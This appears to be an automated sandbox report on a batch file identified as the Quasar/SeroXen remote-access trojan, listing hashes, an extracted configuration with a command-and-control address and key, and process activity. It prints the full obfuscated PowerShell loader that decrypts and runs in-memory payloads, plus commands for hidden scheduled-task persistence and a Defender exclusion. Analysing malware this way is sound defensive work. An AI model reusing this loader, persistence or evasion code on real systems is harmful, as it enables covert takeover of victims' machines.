Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
rename me.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
rename me.bat
Resource
win10v2004-20240426-en
General
-
Target
rename me.bat
-
Size
514KB
-
MD5
414264bb47935bed191128cf44f3a2cd
-
SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130
-
SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
-
SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
SSDEEP
12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4004-75-0x0000000007B80000-0x0000000007BEE000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 4004 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
$sxr-sdinwn.exepid process 3808 $sxr-sdinwn.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1936 ipconfig.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exepid process 1012 powershell.exe 1012 powershell.exe 4472 powershell.exe 4472 powershell.exe 4004 powershell.exe 4004 powershell.exe 3808 $sxr-sdinwn.exe 1840 powershell.exe 3808 $sxr-sdinwn.exe 1840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeIncreaseQuotaPrivilege 4472 powershell.exe Token: SeSecurityPrivilege 4472 powershell.exe Token: SeTakeOwnershipPrivilege 4472 powershell.exe Token: SeLoadDriverPrivilege 4472 powershell.exe Token: SeSystemProfilePrivilege 4472 powershell.exe Token: SeSystemtimePrivilege 4472 powershell.exe Token: SeProfSingleProcessPrivilege 4472 powershell.exe Token: SeIncBasePriorityPrivilege 4472 powershell.exe Token: SeCreatePagefilePrivilege 4472 powershell.exe Token: SeBackupPrivilege 4472 powershell.exe Token: SeRestorePrivilege 4472 powershell.exe Token: SeShutdownPrivilege 4472 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeSystemEnvironmentPrivilege 4472 powershell.exe Token: SeRemoteShutdownPrivilege 4472 powershell.exe Token: SeUndockPrivilege 4472 powershell.exe Token: SeManageVolumePrivilege 4472 powershell.exe Token: 33 4472 powershell.exe Token: 34 4472 powershell.exe Token: 35 4472 powershell.exe Token: 36 4472 powershell.exe Token: SeIncreaseQuotaPrivilege 4472 powershell.exe Token: SeSecurityPrivilege 4472 powershell.exe Token: SeTakeOwnershipPrivilege 4472 powershell.exe Token: SeLoadDriverPrivilege 4472 powershell.exe Token: SeSystemProfilePrivilege 4472 powershell.exe Token: SeSystemtimePrivilege 4472 powershell.exe Token: SeProfSingleProcessPrivilege 4472 powershell.exe Token: SeIncBasePriorityPrivilege 4472 powershell.exe Token: SeCreatePagefilePrivilege 4472 powershell.exe Token: SeBackupPrivilege 4472 powershell.exe Token: SeRestorePrivilege 4472 powershell.exe Token: SeShutdownPrivilege 4472 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeSystemEnvironmentPrivilege 4472 powershell.exe Token: SeRemoteShutdownPrivilege 4472 powershell.exe Token: SeUndockPrivilege 4472 powershell.exe Token: SeManageVolumePrivilege 4472 powershell.exe Token: 33 4472 powershell.exe Token: 34 4472 powershell.exe Token: 35 4472 powershell.exe Token: 36 4472 powershell.exe Token: SeIncreaseQuotaPrivilege 4472 powershell.exe Token: SeSecurityPrivilege 4472 powershell.exe Token: SeTakeOwnershipPrivilege 4472 powershell.exe Token: SeLoadDriverPrivilege 4472 powershell.exe Token: SeSystemProfilePrivilege 4472 powershell.exe Token: SeSystemtimePrivilege 4472 powershell.exe Token: SeProfSingleProcessPrivilege 4472 powershell.exe Token: SeIncBasePriorityPrivilege 4472 powershell.exe Token: SeCreatePagefilePrivilege 4472 powershell.exe Token: SeBackupPrivilege 4472 powershell.exe Token: SeRestorePrivilege 4472 powershell.exe Token: SeShutdownPrivilege 4472 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeSystemEnvironmentPrivilege 4472 powershell.exe Token: SeRemoteShutdownPrivilege 4472 powershell.exe Token: SeUndockPrivilege 4472 powershell.exe Token: SeManageVolumePrivilege 4472 powershell.exe Token: 33 4472 powershell.exe Token: 34 4472 powershell.exe Token: 35 4472 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3344 wrote to memory of 1012 3344 cmd.exe powershell.exe PID 3344 wrote to memory of 1012 3344 cmd.exe powershell.exe PID 3344 wrote to memory of 1012 3344 cmd.exe powershell.exe PID 1012 wrote to memory of 4472 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 4472 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 4472 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 4176 1012 powershell.exe WScript.exe PID 1012 wrote to memory of 4176 1012 powershell.exe WScript.exe PID 1012 wrote to memory of 4176 1012 powershell.exe WScript.exe PID 4176 wrote to memory of 3096 4176 WScript.exe cmd.exe PID 4176 wrote to memory of 3096 4176 WScript.exe cmd.exe PID 4176 wrote to memory of 3096 4176 WScript.exe cmd.exe PID 3096 wrote to memory of 4004 3096 cmd.exe powershell.exe PID 3096 wrote to memory of 4004 3096 cmd.exe powershell.exe PID 3096 wrote to memory of 4004 3096 cmd.exe powershell.exe PID 4004 wrote to memory of 4736 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 4736 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 4736 4004 powershell.exe schtasks.exe PID 4004 wrote to memory of 3808 4004 powershell.exe $sxr-sdinwn.exe PID 4004 wrote to memory of 3808 4004 powershell.exe $sxr-sdinwn.exe PID 4004 wrote to memory of 3808 4004 powershell.exe $sxr-sdinwn.exe PID 4004 wrote to memory of 1840 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1840 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1840 4004 powershell.exe powershell.exe PID 4004 wrote to memory of 1936 4004 powershell.exe ipconfig.exe PID 4004 wrote to memory of 1936 4004 powershell.exe ipconfig.exe PID 4004 wrote to memory of 1936 4004 powershell.exe ipconfig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_454_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_454.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_454.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_454.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_454.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_454.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /flushdns6⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD55dc9a9599fb11ee70f9164d8fea15abf
SHA185faf41a206f3fa8b469609333558cf817df2cda
SHA2563f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
552B
MD5f2beebe547851b37c0a8293e3bd2b95c
SHA14f5920949efaf43096392779fa5a441d0f5c65fe
SHA256a5894a151f79cb8a20fc52110c99bb76819fb1551b1e3f2d84500f948c0de31c
SHA512f3b03d0448636560e5cb0e4ee338fe3c44837e7200ecd96f83b6fe9e5d0309655a7232a679baa0201776556740b9abe725630ea66578efa9040b0ef075491fe4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD518c4be9e64a0d0f245f9859a425914e6
SHA19e56ddf1e3832e6a623dc0f3735fed4edaed7df1
SHA256302efa39082c62d0a4fc9dcc6b4f32ffa68fdc9a2a74ca87619a0fb8b4e93628
SHA5120725a05aae7572526919a66a2e9057de49af1dc643803005df76f7f35b42262a80fadf41771fbecb6a2951e72e1b891359aa07b70ceb19dd274509d0a2cf2bbc
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vc1nr0rb.jf3.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\startup_str_454.batFilesize
514KB
MD5414264bb47935bed191128cf44f3a2cd
SHA1df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
C:\Users\Admin\AppData\Roaming\startup_str_454.vbsFilesize
115B
MD504ef436a45d9facc49587df0e5360246
SHA102db5c2e48bc01d20183bc5b3dbb49e46471371b
SHA256e51b4c8060834d2eba5b5eee185a57ac2cc413845887946e1f50fb297e3358be
SHA512b2bfc75c790aa1c908f28c816e2d5faec4c5e4b4f20c35c63d2202b2563e28ce7febf33d07a5e76c9c824547568e11ab9c88f77940e166e8ed5809067dadd976
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exeFilesize
411KB
MD5bc4535f575200446e698610c00e1483d
SHA178d990d776f078517696a2415375ac9ebdf5d49a
SHA25688e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717
-
memory/1012-23-0x0000000009080000-0x0000000009626000-memory.dmpFilesize
5.6MB
-
memory/1012-7-0x0000000005630000-0x0000000005696000-memory.dmpFilesize
408KB
-
memory/1012-16-0x0000000005D30000-0x0000000006087000-memory.dmpFilesize
3.3MB
-
memory/1012-17-0x00000000061C0000-0x00000000061DE000-memory.dmpFilesize
120KB
-
memory/1012-18-0x0000000006340000-0x000000000638C000-memory.dmpFilesize
304KB
-
memory/1012-19-0x0000000007A00000-0x000000000807A000-memory.dmpFilesize
6.5MB
-
memory/1012-20-0x0000000006790000-0x00000000067AA000-memory.dmpFilesize
104KB
-
memory/1012-21-0x0000000002890000-0x0000000002898000-memory.dmpFilesize
32KB
-
memory/1012-22-0x00000000073E0000-0x0000000007442000-memory.dmpFilesize
392KB
-
memory/1012-4-0x0000000005700000-0x0000000005D2A000-memory.dmpFilesize
6.2MB
-
memory/1012-5-0x0000000005420000-0x0000000005442000-memory.dmpFilesize
136KB
-
memory/1012-1-0x0000000075130000-0x00000000758E1000-memory.dmpFilesize
7.7MB
-
memory/1012-2-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/1012-6-0x00000000055C0000-0x0000000005626000-memory.dmpFilesize
408KB
-
memory/1012-3-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/1012-77-0x0000000075130000-0x00000000758E1000-memory.dmpFilesize
7.7MB
-
memory/1012-0-0x0000000002E10000-0x0000000002E46000-memory.dmpFilesize
216KB
-
memory/1840-116-0x0000000007E60000-0x0000000007E75000-memory.dmpFilesize
84KB
-
memory/1840-102-0x0000000007870000-0x0000000007892000-memory.dmpFilesize
136KB
-
memory/1840-104-0x0000000071320000-0x000000007136C000-memory.dmpFilesize
304KB
-
memory/1840-113-0x0000000007B20000-0x0000000007BC4000-memory.dmpFilesize
656KB
-
memory/1840-114-0x0000000007E20000-0x0000000007E31000-memory.dmpFilesize
68KB
-
memory/1840-115-0x0000000007E50000-0x0000000007E5E000-memory.dmpFilesize
56KB
-
memory/1840-117-0x0000000007EB0000-0x0000000007ECA000-memory.dmpFilesize
104KB
-
memory/1840-118-0x0000000007E90000-0x0000000007E98000-memory.dmpFilesize
32KB
-
memory/3808-101-0x0000000006E30000-0x0000000006E76000-memory.dmpFilesize
280KB
-
memory/4004-78-0x0000000007D50000-0x0000000007D62000-memory.dmpFilesize
72KB
-
memory/4004-76-0x0000000007C90000-0x0000000007D22000-memory.dmpFilesize
584KB
-
memory/4004-79-0x0000000008010000-0x000000000804C000-memory.dmpFilesize
240KB
-
memory/4004-75-0x0000000007B80000-0x0000000007BEE000-memory.dmpFilesize
440KB
-
memory/4472-50-0x0000000007410000-0x00000000074B4000-memory.dmpFilesize
656KB
-
memory/4472-48-0x0000000002B80000-0x0000000002B90000-memory.dmpFilesize
64KB
-
memory/4472-52-0x0000000007860000-0x00000000078F6000-memory.dmpFilesize
600KB
-
memory/4472-54-0x0000000002B80000-0x0000000002B90000-memory.dmpFilesize
64KB
-
memory/4472-51-0x0000000007650000-0x000000000765A000-memory.dmpFilesize
40KB
-
memory/4472-57-0x0000000075130000-0x00000000758E1000-memory.dmpFilesize
7.7MB
-
memory/4472-49-0x0000000002B80000-0x0000000002B90000-memory.dmpFilesize
64KB
-
memory/4472-53-0x00000000077E0000-0x00000000077F1000-memory.dmpFilesize
68KB
-
memory/4472-47-0x00000000073E0000-0x00000000073FE000-memory.dmpFilesize
120KB
-
memory/4472-38-0x0000000071320000-0x000000007136C000-memory.dmpFilesize
304KB
-
memory/4472-36-0x00000000073A0000-0x00000000073D4000-memory.dmpFilesize
208KB
-
memory/4472-37-0x000000007F200000-0x000000007F210000-memory.dmpFilesize
64KB
-
memory/4472-26-0x0000000002B80000-0x0000000002B90000-memory.dmpFilesize
64KB
-
memory/4472-27-0x0000000002B80000-0x0000000002B90000-memory.dmpFilesize
64KB
-
memory/4472-25-0x0000000075130000-0x00000000758E1000-memory.dmpFilesize
7.7MB